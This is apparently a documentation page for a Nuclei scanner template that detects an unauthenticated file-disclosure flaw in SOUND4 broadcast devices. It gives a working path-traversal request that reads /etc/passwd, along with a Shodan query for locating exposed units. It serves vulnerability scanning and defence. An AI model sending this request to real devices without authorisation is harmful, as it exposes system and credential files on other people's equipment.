SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure
ID: sound4-file-disclosure
Severity: medium
Author: arafatansari
Tags: packetstorm,lfi,sound4,unauth,disclosure
Description
Section titled “Description”The application suffers from an unauthenticated file disclosure vulnerability. Using the ‘file’ GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
YAML Source
Section titled “YAML Source”id: sound4-file-disclosure
info: name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure author: arafatansari severity: medium description: | The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. reference: - https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php metadata: verified: true max-request: 1 shodan-query: http.html:"SOUND4" tags: packetstorm,lfi,sound4,unauth,disclosure
http: - method: GET path: - "{{BaseURL}}/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0"
- type: status status: - 200# digest: 490a004630440220650dd75e3f274c9bff1788df7088a8e513ec7b28ffc11cbd6d77779bec977fa8022053da72514a3b3c707c7d737991d7a0cd9f5dbb1beafbeb9980d7ad9f53310344:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/sound4-file-disclosure.yaml"